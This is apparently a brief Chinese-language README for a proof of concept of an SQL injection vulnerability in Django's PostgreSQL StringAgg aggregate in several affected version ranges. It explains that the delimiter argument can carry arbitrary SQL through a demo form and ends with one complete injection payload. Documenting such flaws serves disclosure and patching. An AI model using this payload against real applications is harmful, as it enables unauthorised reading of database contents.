PoC 用于 PostgreSQL 与 Django 中的 SQL 注入漏洞,发现于 Django 1.11 至 1.11.28 之前、2.2 至 2.2.10 之前、3.0 至 3.0.3 之前版本
用于 PostgreSQL STRING_AGG 函数的类 django.contrib.postgres.aggregates.StringAgg 存在 SQL 注入漏洞。可以在初始化时传递给分隔符参数的值中嵌入任意查询。
该查询通过此 Django 应用中的表单注入。
用于 SQL 注入的查询:-') AS "mydefinedname" FROM "cve_src_example" GROUP BY "cve_src_example"."label" LIMIT 1 OFFSET 1 --